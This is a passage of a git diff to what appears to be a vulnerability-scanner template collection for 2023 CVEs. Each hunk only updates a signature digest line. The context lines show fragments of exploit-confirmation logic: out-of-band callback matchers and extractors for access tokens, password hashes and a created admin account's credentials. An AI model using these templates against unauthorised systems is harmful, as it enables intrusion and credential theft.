a/http/cves/2023/CVE-2023-32563.yaml +++ b/http/cves/2023/CVE-2023-32563.yaml @@ -57,4 +57,4 @@ http: part: body_2 words: - "CVE-2023-32563" -# digest: 490a0046304402207ef41427803cc77d9625eb96fcb7415c04bb9cdb0cc70363d165754c36f0c44902204d3a8adef4461aac1fac0b12e9ce6ec990138f2a800440d04195167b5401293a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bcb886c214a8274523a21aff0b8a3ddb9c802aaf224163eff068884c00eeb89a0221009d23274822bbcdf1d23b8faad8293c92291c08909d8e7419b963dc6644e10b5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33338.yaml b/http/cves/2023/CVE-2023-33338.yaml index 1fb2c9f850..4d986e27d9 100644 --- a/http/cves/2023/CVE-2023-33338.yaml +++ b/http/cves/2023/CVE-2023-33338.yaml @@ -47,4 +47,4 @@ http: - 'contains(body_2, "Change Password")' - 'contains(body_2, "Old Age Home Management System|| Dashboard")' condition: and -# digest: 4a0a00473045022049057b44ba68b587a1d00ddececb11eb4b27973f9ed5ba5245e260357d80f01e022100c0abd873024b519872465347f63f229d7d4f19a80fa3fefb6e91f5645122b483:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220603bdc568c4f8bd254d3de537116f53403754a72af1ec456be55b3cc86bbad9b022100fb5e43cac19c09bc220b1ca500ce14df1866cf778dad28ecdc0da95f52ff3ced:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33405.yaml b/http/cves/2023/CVE-2023-33405.yaml index 794a2e3ef7..1d2dbc4bd0 100644 --- a/http/cves/2023/CVE-2023-33405.yaml +++ b/http/cves/2023/CVE-2023-33405.yaml @@ -39,4 +39,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$' part: header -# digest: 4b0a00483046022100a8cc2487ecefb4e25e4229b95328dd670f5646f049cec123bc2d0f5f2d34c710022100fe1204d93a53829adb780486928f36bf4a2e53c68e323ebbaa01efa091650583:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220688bfd54312c98cad70ea11756eb7d605e63cefdbf740953ec17b2758ffc9b58022074870fe4f5e1a9bad57a43ddb9c459c577ed1d240208b5b0a52d9830f15e5a70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33439.yaml b/http/cves/2023/CVE-2023-33439.yaml index 9b16725752..06995026bc 100644 --- a/http/cves/2023/CVE-2023-33439.yaml +++ b/http/cves/2023/CVE-2023-33439.yaml @@ -48,4 +48,4 @@ http: - 'contains(body, "Fatal error:")' - 'contains(body, "XPATH syntax error:")' condition: and -# digest: 4a0a00473045022038e305e1a427828938e09914041e2f6b067eac093c57894b8e785e2226c492120221009c7b52f37dbe1da9686032f5a6807f5ebe4accd86ee5119086ce69fb0d806439:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e9a83ae1afdf43ea099513f3584f1caac1e8a777e61d101821e80a29960249cb022074a42afd0ca26223778dcd1ea8d2372e6b5b53f971633f5b7fb4ac1f8c35b7d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33440.yaml b/http/cves/2023/CVE-2023-33440.yaml index 4f13c943c1..6c819010db 100644 --- a/http/cves/2023/CVE-2023-33440.yaml +++ b/http/cves/2023/CVE-2023-33440.yaml @@ -85,4 +85,4 @@ http: - 'len(body_1) == 1' - 'contains(body_2, "Faculty Evaluation")' condition: and -# digest: 4a0a00473045022100f46293b8073f7feb73466f375ea29605a51c096af01c4816241166a69c603631022014393248bcab1932c5437e8434c9d61f71848a6068b89042745e3b10cc28e967:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201b5d53a634d522ffd0302ad7feec865783d2a241b8f3ccfd0b3d4a8d441a765202207e6111dade4a0684ae0224bab14df4d8e4ee5a17142d2c379d1615b52abc4032:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3345.yaml b/http/cves/2023/CVE-2023-3345.yaml index 4c02631ca1..57ae61a021 100644 --- a/http/cves/2023/CVE-2023-3345.yaml +++ b/http/cves/2023/CVE-2023-3345.yaml @@ -75,4 +75,4 @@ http: regex: - '"nonce":"([a-z0-9]+)","versionString' internal: true -# digest: 4b0a00483046022100d9d214d95910b9ab36686cebb68a0c698a36dcd4f494d1ba91e3d9c36a77cc66022100b58afe9567fddc352d339dfa985e55105c2184de7b06d0a2a756ba07e34d1979:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100df1e86d9fc956df53bf31eecfcb419718e7cb6b90305c5927341af67c249bcb30220608d59b3161d92fd9e28b9c9c7ea01c5e879c25bc20d0b247590501904e508c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33510.yaml b/http/cves/2023/CVE-2023-33510.yaml index 010c64efed..b11596ec06 100644 --- a/http/cves/2023/CVE-2023-33510.yaml +++ b/http/cves/2023/CVE-2023-33510.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009e162dbb1787d5c8b032abe3bf70bb51a039c53b2df9c8e71d5971b297d962bb0221009b98beb3b2add0df90bddc57c9ed57f15adc1f361360d012658f5c9e2265d724:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220171abcc1c0a83a429a04ba26dc24dbabb63a86500669886aac8290f2fe0e7c81022100a1b42db8bf7ef06ccf26e400d065cc3b7b4871399e0b76c0500aa7b121e4b29e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33568.yaml b/http/cves/2023/CVE-2023-33568.yaml index bd1a73705a..8ad2d88a92 100644 --- a/http/cves/2023/CVE-2023-33568.yaml +++ b/http/cves/2023/CVE-2023-33568.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ea402dd44c43bec190ee2c16ae40ec0becb281a3f9867e3060d721011b78172f0220207c33b176fb9d8e6bf50fe9c81e797fd14fa29c9e39886d850c61d378f9f352:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220134e0463102496737a2efd38625b6a7aeda5925f8f9924751b0917a46cc17d10022065a6e0e9df979a4efc3ee24912f2916fd08762932995091f79ea114ddf822664:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33584.yaml b/http/cves/2023/CVE-2023-33584.yaml index 328e959999..016e70a4ca 100644 --- a/http/cves/2023/CVE-2023-33584.yaml +++ b/http/cves/2023/CVE-2023-33584.yaml @@ -46,4 +46,4 @@ http: - 'contains(content_type, "text/html")' - 'status_code == 200' condition: and -# digest: 490a0046304402202f40626ab7516149dc904a0b037b08e20f1600b2c5120af0de3a1ae0c7734d740220179ff4ff2a58eb3877f3c34bb4da803721baf5aeb1e1f69ace56203fd229a98a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206aaa84cea2c1bd95ad50ada9f31acf013411b7cc186218000d599f6a5fcb5f4c0220475a15acd3ca7129f3a4a37fa8f08f102f77fe30ab802737f61c6585f97452a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33629.yaml b/http/cves/2023/CVE-2023-33629.yaml index c20fbd45bb..ac6e498000 100644 --- a/http/cves/2023/CVE-2023-33629.yaml +++ b/http/cves/2023/CVE-2023-33629.yaml @@ -48,4 +48,4 @@ http: - status_code_2 == 200 - contains_all(body_2, 'www', 'www_multi') condition: and -# digest: 4b0a00483046022100b6854bf0faa5050128ca42d2d2ee3d37b3e95d98ee44027b193290a3cb94d1690221008fc6436949fc3b2d1ec7052d3740326ec505a58597f35ba52a30bae0163b9a2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220010a42dcc79d3f304caa62a907714a428e2a193d274b69fce7dc0cfe4cda97880220765de31c96bf2c968cb53f751fc2f3900eb928d56e97ce5edc301442091ff3ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3368.yaml b/http/cves/2023/CVE-2023-3368.yaml index 85b6d868c2..3b3d43d113 100644 --- a/http/cves/2023/CVE-2023-3368.yaml +++ b/http/cves/2023/CVE-2023-3368.yaml @@ -76,4 +76,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a004630440220045df4ec7bd54f950a3e0c12515456f864f6b6b0c5157bf1926e6f7a8e0759ef02203aed940f4a3d5004abd9ab1a98f0acba93578c711cb452f66bc908ae41ee4bcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f131e049a903929669620739a042ef371cc53d14f7e330b5b1dd0a50032adb2e022100c65b26151fa200111cc70cbf4e292e7de91799cdd5ec182bf139fc69896ec655:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33831.yaml b/http/cves/2023/CVE-2023-33831.yaml index 8c7e47e1c5..9acfeb4e3a 100644 --- a/http/cves/2023/CVE-2023-33831.yaml +++ b/http/cves/2023/CVE-2023-33831.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c3a7d1063d8635eb891376a22064bd392f1ead31bb4930547b533a9efa30ca36022065ed89b3798c768de3abfc936c9f78d68c3320d5e0f93b7f3908128065037934:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204906769baaa40653efd8db40c78d1b7a5edc2464a567a9dee1b23c10b735a8f502200e663a070de2ca910bc6c3e9b9736ab7f055c56b105bde2cac618eadf82664f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34020.yaml b/http/cves/2023/CVE-2023-34020.yaml index 7b7c314455..95255a6a06 100644 --- a/http/cves/2023/CVE-2023-34020.yaml +++ b/http/cves/2023/CVE-2023-34020.yaml @@ -33,4 +33,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4a0a00473045022100863feeb025ff903aec139893d251ec1fb6d2afd5b5817e69dba4be2f8939696902201d851c543d8c5013957bc626be07c2d192201385d1a8f3ab7505696dc02b13e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201c291b8c777b1f2832181c0b177acec46e3a1864d8cda77bb5d56b7aabd0cf5d022100bb38f50f255d8d3fcea6bbe1d7bc2367500fee3c65ea13c990bc0c970a2f4934:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34124.yaml b/http/cves/2023/CVE-2023-34124.yaml index e9e0046db9..49b6bf1bb0 100644 --- a/http/cves/2023/CVE-2023-34124.yaml +++ b/http/cves/2023/CVE-2023-34124.yaml @@ -91,4 +91,4 @@ http: group: 1 regex: - "getPwdHash.*,'([0-9]+)'" -# digest: 4a0a00473045022100dff5af913f6255a502dbf50816f39ec4a629ff0e3275b9fd2aa5c0d742b9a85202207d90e978f0d17059baa99aac6f41112ed07e6dda4ec8b392b8ed6ea5956c3716:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220535bce466bdc32d6868a70227a183d1b6246f93d044a5aecde35e07f4ddb140a022100d8d1f4d3c91b5da971ecd3f6a2c1431fca7c60a3ba9bf7dbcdbacea3a67bdbe0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34259.yaml b/http/cves/2023/CVE-2023-34259.yaml index b7e9c7e166..ac440faa69 100644 --- a/http/cves/2023/CVE-2023-34259.yaml +++ b/http/cves/2023/CVE-2023-34259.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dfe11a778c6bdc20a3e3c51aa378203f41b531b6cf2b922ffddca585df371d4e022100ea0109fec66b77cdff0258b416143e4a92a9b0da63dd600edb0836e302cc174e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220565b9c37b53169915914ce76aa88eda5c5c85f6f97f130b384923bb32f87173f022100f64be4191c6db18ae4d2c6447f91bd5a10dd17c89ffed7373b4c903b24da0ed4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34362.yaml b/http/cves/2023/CVE-2023-34362.yaml index 406fc7064e..ac5b3e2c32 100644 --- a/http/cves/2023/CVE-2023-34362.yaml +++ b/http/cves/2023/CVE-2023-34362.yaml @@ -131,4 +131,4 @@ http: regex: - '"access_token":"([^"]+)"' part: body -# digest: 4a0a00473045022100b66b36a008640a423f2f0fa1a14b6eb4ea8e0c6286f98b3bda9ed0b5bca93d6602207271e8506cb66d80bf7ba5b3e3dffb13a6d9efb504e04a023023eabc45ac1ea2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f72d08a9b9e841e0d447155a1414f61d5ae334e47b039783b1c835489d799ab2022100952cf077ba2d49d2a333ddb774a88cc81eaba6a5ac76e2ed85bdfe6974a14999:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34537.yaml b/http/cves/2023/CVE-2023-34537.yaml index 8f929d6583..7bf13dbae1 100644 --- a/http/cves/2023/CVE-2023-34537.yaml +++ b/http/cves/2023/CVE-2023-34537.yaml @@ -58,4 +58,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "HotelDruid")' condition: and -# digest: 4a0a0047304502200de8e633c0dd2ad6adb380982fe7ad6513164c424ed34a3632ca17c73f0920e10221009c417b2df6c96eefaeb795d7f1b2f7c2ad6db0d80b376dbeda82d37ab8bb5554:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220594727b9aa1101988289ccadc4c1c6546c46c0670893e0695189c996466496920221008e5888788e8db0931ef0643410d2ae1a34c6293b915967180eecc5b282857d4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34598.yaml b/http/cves/2023/CVE-2023-34598.yaml index 63628bf4ec..612b542d3e 100644 --- a/http/cves/2023/CVE-2023-34598.yaml +++ b/http/cves/2023/CVE-2023-34598.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100eaebd01f85c85ab0ac1c84e6687bddb67703b7b394beddfc320b8a31e9c6cd8d022100d361cee4f4db9cd03330b2674ac1fdba912a93c4ea328fdca0d56ded1ca1dd72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008ca220a11f960573e2129266cde12324d410026c5d5d0587bfce9b5847c87409022100f2ef58a2d030365cd3311aed103b93e2a9fbde99170d36a6d5dbb99d50abff41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34599.yaml b/http/cves/2023/CVE-2023-34599.yaml index a54eff2245..f69511db73 100644 --- a/http/cves/2023/CVE-2023-34599.yaml +++ b/http/cves/2023/CVE-2023-34599.yaml @@ -86,4 +86,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203cec5c69d848ab901cd50048ccf42101ac2225bf4526924741e76b9c2d71f0c602205a4b024f5bc6a5bf347f17eaecb260bd276bc4001285005c217c13d424a5b233:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022045b390f5760ae270e3a2519cce300ec389e0ee56fd2db189cdb00dfa65cfad0c02201654dcbabab3dd638bdef30d973d90eaa2bb5315592d3abc7059c6dbe3973959:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3460.yaml b/http/cves/2023/CVE-2023-3460.yaml index 9d5d784e8e..0bebb53fd9 100644 --- a/http/cves/2023/CVE-2023-3460.yaml +++ b/http/cves/2023/CVE-2023-3460.yaml @@ -105,4 +105,4 @@ http: dsl: - '"WP_USERNAME: "+ username' - '"WP_PASSWORD: "+ password' -# digest: 4b0a00483046022100b493c7d63335e4d391cb5cc16773998839c91742ebdca9ed34de149a896d8635022100dd6e41ff08a478312111f10087ecd9bcf0cab2c7596f13f55ced60e7ff2102bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220173eeac6cfcdda83cedba6a13700d48f6167c4a69304204c41c53291982fec3602204eb02aaf7b7b0995b3b8092e842f23bbb69e20c6b44bb3a7335caf50d296446b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34659.yaml b/http/cves/2023/CVE-2023-34659.yaml index d86ab04fb3..4101e78588 100644 --- a/http/cves/2023/CVE-2023-34659.yaml +++ b/http/cves/2023/CVE-2023-34659.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009479667c973f231f672de742d4d97331b4c21e19dbb0a788759c317ba27f8c39022048d0e0658080c3f33b833368dad4f9bf938432524fa1d99a3bc9bb30daf57e9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220261dcb2fc690e0650162d3d2590314a23a7e22334a2d7a97876251db319cf4e402207e8d42b990514592525016042ca6befa9c490acf09625ea741303d3354fcca40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34751.yaml b/http/cves/2023/CVE-2023-34751.yaml index 55e4298a76..052e9a6997 100644 --- a/http/cves/2023/CVE-2023-34751.yaml +++ b/http/cves/2023/CVE-2023-34751.yaml @@ -50,4 +50,4 @@ http: - contains(header_2, "text/html") - contains(body_2, 'bloofoxCMS Admincenter') condition: and -# digest: 490a0046304402206f461d9a22d4192ae50d7184b7c62456f024994ec86af7ac106a6acf92d75e9a02205c9f5d1ee349fbfb52b415a8925b40bc8086234dba1a1db9810e2c19cbc23dcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009948aee763684825bc9b30c6fe75b736a1088ac0214c3264894147e3b56d685f02210092dffec3ee044843ce64c7a4d9fcc0353ccb52eea84a40cb6c8f5fa130d0ec81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34752.yaml b/http/cves/2023/CVE-2023-34752.yaml index 2f1236d64e..6a30bbff88 100644 --- a/http/cves/2023/CVE-2023-34752.yaml +++ b/http/cves/2023/CVE-2023-34752.yaml @@ -52,4 +52,4 @@ http: - contains(header_2, "text/html") - contains(body_2, 'bloofoxCMS Admincenter') condition: and -# digest: 4a0a00473045022100d2ee0c48456364462d7c1a8ea7bb091882fa60e3f5feef0fbf0e95d002a1f9d502200ec877b901dcbe66ed9604657f506954e463a2e83c5da054a3d0a25a2872cea5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022004a81e5709fff9b5aa23e045c78c35817e5dbc8812da316c1c51e94ff787290702206dc169530141429140ce90a9e66c6dc159adbaa396626fccea387b98bca761ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34753.yaml b/http/cves/2023/CVE-2023-34753.yaml index 3d933c4083..ddcf01b94c 100644 --- a/http/cves/2023/CVE-2023-34753.yaml +++ b/http/cves/2023/CVE-2023-34753.yaml @@ -50,4 +50,4 @@ http: - contains(header_2, "text/html") - contains(body_2, 'bloofoxCMS Admincenter') condition: and -# digest: 4a0a00473045022100f737b834d8d2f63b18c8ba8cf13ec2d6d966422dde65c1cbe93267a6e3eb3e7e02206668e55a7520baf24cf028a0f98825d967c1ec5440bc46a3b838c8d15e22f6e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022050966a0d4c22ad96e6b4dc9b6776bc3be3ead136f9b455a1af5324a51b9ab6f8022100d09acb65cf947baaafa685326925167947592152796d14ac68e70bf9665f8efa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34755.yaml b/http/cves/2023/CVE-2023-34755.yaml index 85c0786203..0afac821d8 100644 --- a/http/cves/2023/CVE-2023-34755.yaml +++ b/http/cves/2023/CVE-2023-34755.yaml @@ -50,4 +50,4 @@ http: - contains(header_2, "text/html") - contains(body_2, 'bloofoxCMS Admincenter') condition: and -# digest: 4b0a00483046022100bc99c284b4061d571cd1f1f53fd4e4672d259fe90e88211dffdc8cf9fae2e535022100feddc93a339ace87fe03ff5ac04e7dcaccd3a1c432b3d375626183619de26896:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022048ef5100fdc4d5780eb5f4cfdf714c6104252db498c8096382ebdc158fd4b00e02200928fd94715a0774521522f3f39adc16f83e3d3c20fc9fb500b25d604baf9495:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34756.yaml b/http/cves/2023/CVE-2023-34756.yaml index 975dbb1e81..ad157cacb0 100644 --- a/http/cves/2023/CVE-2023-34756.yaml +++ b/http/cves/2023/CVE-2023-34756.yaml @@ -51,4 +51,4 @@ http: - contains(header, "text/html") - contains(body_2, 'Admincenter') condition: and -# digest: 4b0a004830460221008292d511617bd0c0a8bcafe1cfa684cc711d54ab9a4eb35f63670ed0da9bb7070221008b351cb79ef3863804a1be0bb6833d415171ff25050bffc03a68641202906cd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100faf8f6ee6e838ca74e557254d5f6eb4d65a2b88c1db9ee61c42ba55d99a43adc0220396cf436a61c0b7d7687b1a0d744f99bd6ff57ebb60acdb17400dc7b69304ee8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3479.yaml b/http/cves/2023/CVE-2023-3479.yaml index f84ce59c9e..facebf75bc 100644 --- a/http/cves/2023/CVE-2023-3479.yaml +++ b/http/cves/2023/CVE-2023-3479.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210098751517d9e020d64addef3f14cedca2d680492140d36e7544d0aa498932ce6102207f8df37d808c0662f751c6bef40da619f38e4f2303bc45fffc57c6bd1a656b2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f1877788ae671ddcc6c5dbdcc650342aaf360eb349e967a586cf75858aab932c022100ba0dfed6f83494f955107a535f7b557ef0bb3d87bd2f5e6e9e1c9012d96c351e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34843.yaml b/http/cves/2023/CVE-2023-34843.yaml index 2dab5b6922..ad5547cf04 100644 --- a/http/cves/2023/CVE-2023-34843.yaml +++ b/http/cves/2023/CVE-2023-34843.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b64fb96d0bdf7e75e75a35ec0199aa1a3b5ad75d08cb6c6005cdab98520d23e2022100edd40b93a955f7bda18c65178cbbb5d427b07936f1be261dae3217d6a0871932:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f5f6814aa5d06c039624e1388900e0996315533d8c419eefbe2de6caf447910a022100e6c8e5b02653c56e18102d89247b0711570a77ff45625ccf9e7cca81d1ed08b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34960.yaml b/http/cves/2023/CVE-2023-34960.yaml index a0c18ba776..931c9a0825 100644 --- a/http/cves/2023/CVE-2023-34960.yaml +++ b/http/cves/2023/CVE-2023-34960.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202d995b5c47a61e69483f37d5514da329e6e5264c597a3db33117f015a98ea951022074cb814111b69e59c9ca138398de1758fb2b9ddff8e946023fc973237475ec59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c39406182802fe8b9ffa065f62e7be3e481669903d495a6949fb9b4cf5c3fa8802205791c3506012ccf296d6dae5ddf44dee9f869f2b7eec108a352c0ec94274c48b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34993.yaml b/http/cves/2023/CVE-2023-34993.yaml index 6b24fab5c1..946d4d2e02 100644 --- a/http/cves/2023/CVE-2023-34993.yaml +++ b/http/cves/2023/CVE-2023-34993.yaml @@ -51,4 +51,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# digest: 490a0046304402205d0bf594e5e591c8131ea79f03e90148cd44bb6a34f98409151d12e3e02decdf02200769496d8dae7769c9ed8d8aff7f94757ad51ddb46d0c8212cba99fd3f6c225b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c11dc698621ad5d479ce8b696577f5cefad748f79e912c23b63ec28b8241cab7022100eb380ef3a5801902ee831f7cea179e4e86d8cc93bdeb381d1985e4a367a6b44d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-35078.yaml b/http/cves/2023/CVE-2023-35078.yaml index 4ca1beb09a..43ab14d11a 100644 --- a/http/cves/2023/CVE-2023-35078.yaml +++ b/http/cves/2023/CVE-2023-35078.yaml @@ -45,4 +45,4 @@ http: - contains(header, 'application/json') - status_code == 200 condition: and -# digest: 4a0a00473045022100e1348fd4216357ac7e04464f4ee2110e2828d3baf74786912a7106513c9d0f35022036ee43c70796a983b64da6cf1e77b10acd9d728c64a873b8785e14159e5f999e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fb617461878cbf1cb97fb26512af671a914dc1d115f559de3711731793a4c89e022032c6a861070e3124588eba232d2457156b4686063cac141690eee2f1a9e366c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-35082.yaml b/http/cves/2023/CVE-2023-35082.yaml index c7e16c73e4..6b6b844a10 100644 --- a/http/cves/2023/CVE-2023-35082.yaml +++ b/http/cves/2023/CVE-2023-35082.yaml @@ -45,4 +45,4 @@ http: - contains(header, 'application/json') - status_code == 200 condition: and -# digest: 490a004630440220294c36ae327578d5c37bbd02ecaddc883e04adf0ba0c9abd849ee966e6ac2aa002203394fbc3e007a113edbf89c8f0d1799750ba6b77f9e3894b8fb601d6e8e0d05a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b4843883fe2485c515a79c00d17ea62c065bd50025c2c4c7a243d434d65daf1802207835fc7e73d18f106d16c31391ba326357df94fc9b3ebbea01335a66535e1f8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-35158.yaml b/http/cves/2023/CVE-2023-35158.yaml index 6ddc352321..7d75702994 100644 --- a/http/cves/2023/CVE-2023-35158.yaml +++ b/http/cves/2023/CVE-2023-35158.yaml @@ -41,4 +41,4 @@ http: - 'contains(header, "text/html")' - 'status_code == 200' condition: and -# digest: 4a0a00473045022100c6c91bc1cafbd787223af97e5547530e8543d2a73bdc2cfb85cedd488a7e695b022006c285923b223b83c2a2d0b7436f826f8058fb22a2641e34fef6c20843b50804:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b0c7423bf18413a0b58744deba1ec262ca414bb3b5f104c43651fd6b38ab44a7022062f98e95a05171d79819833fc2b54e8e47af9df4f77767967d9b6a5283628cbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-35813.yaml b/http/cves/2023/CVE-2023-35813.yaml index 42ae14df18..6d1c1f40ad 100644 --- a/http/cves/2023/CVE-2023-35813.yaml +++ b/http/cves/2023/CVE-2023-35813.yaml @@ -56,4 +56,4 @@ http: - contains_all(body, 'commands', 'command', 'value') - status_code == 200 condition: and -# digest: 4a0a004730450221008be0771baa09541819eed8cf8490b59d21222fd4e149890367eb446483e86aad022022d5602d27c4a4dbfb1831c5bbfc693e39da6614d3b85493036b7352a98c6033:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022018d2981931169b4ac76f2bc53373c35e3d41e15fbbd0edc56a74f3c9349996e20220031a4d9fdd2c00078341cf9cc6272c27cddef495be952aa84ef5f5288f981f91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-35843.yaml b/http/cves/2023/CVE-2023-35843.yaml index f2adc64f35..266441641a 100644 --- a/http/cves/2023/CVE-2023-35843.yaml +++ b/http/cves/2023/CVE-2023-35843.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d54ca66a373a5bdcb687b5b8b95c728c3ce6b58452faa138205faece235ac65b02210088184db11f7365836e9398e8726d7171649424fa801671bb3b01055266eec5e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210088559921b903d99eb60be5c8d1c736542f2efcb6c870db07e407f880b952766902201f27e867d62d7b074b3f4239f748cfdceaa4a639ef021eb983afa2e4a1421592:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-35844.yaml b/http/cves/2023/CVE-2023-35844.yaml index c21afb2f8a..959d70c650 100644 --- a/http/cves/2023/CVE-2023-35844.yaml +++ b/http/cves/2023/CVE-2023-35844.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 